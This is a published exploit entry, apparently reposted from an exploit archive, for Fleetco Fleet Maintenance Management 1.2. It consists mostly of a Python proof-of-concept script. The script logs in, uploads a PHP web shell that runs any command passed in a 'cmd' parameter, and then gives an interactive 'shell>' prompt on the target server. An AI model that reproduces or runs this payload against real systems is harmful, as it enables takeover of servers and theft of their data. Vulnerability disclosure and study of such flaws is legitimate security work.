# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution
# Date: 2018-11-23
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Date: 2018-11-23
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.fleetco.space
# Software Link: http://www.fleetco.space/download/215/
# Version: v1.2
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management
# system written in PHP with MySQL database backend.
# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which
# leads to a remote command execution on the remote server. Any authorized user is enough to exploit.
# ==================================================================
# PoC:
#!/usr/bin/python
import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore
print "
[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution"
print "[*] Vulnerability discovered by AkkuS"
print "[*] My Blog - https://www.pentest.com.tr
"
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)
rhost = sys.argv[1]
# User Information Input
UserName = str(raw_input("User Name: "))
Password = str(raw_input("Password: "))
# Login into site
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()
br.set_handle_robots(False)
# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.open("http://"+rhost+"/login.php")
assert br.viewing_html()
br.select_form(name="form1")
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()
# Where are you
title = br.title()
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
# Create Accident Records with multipart/form-data to RCE
rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"}
rce_data="-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Fleet_1"
Cargo Carriers
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Vehicle_1"
BF1470
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Type_1"
Lorry
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Date_1"
11/07/2018
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="type_Date_1"
date2
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="type_Time_1"
time
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Driver_1"
Antony Croos
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Details_1"
test
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="type_Images_1"
upload2
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_Images_1"; filename="RCE.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="filename_Images_1"
RCE.php
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_EnteredBy_1"
Mark Croos
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="value_SysDate_1"
2018-11-23 14:58:09
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="id"
1
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="a"
added
-----------------------------10664657171782352435254769348
Content-Disposition: form-data; name="rndVal"
0.8040138072331872
-----------------------------10664657171782352435254769348--
"
upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data)
if upload.status_code == 200:
print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
# Shell validation and exploit
while True:
shellctrl = requests.get("http://"+rhost+"/files/RCE.php")
if shellctrl.status_code == 200:
Command = str(raw_input(Fore.WHITE + "shell> "))
URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"")
print URL.text
else:
print (Fore.RED + "+ [X] Unable to upload or access the shell")
sys.exit()
Fleetco Fleet Maintenance Management 1.2 Remote Code Execution
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 253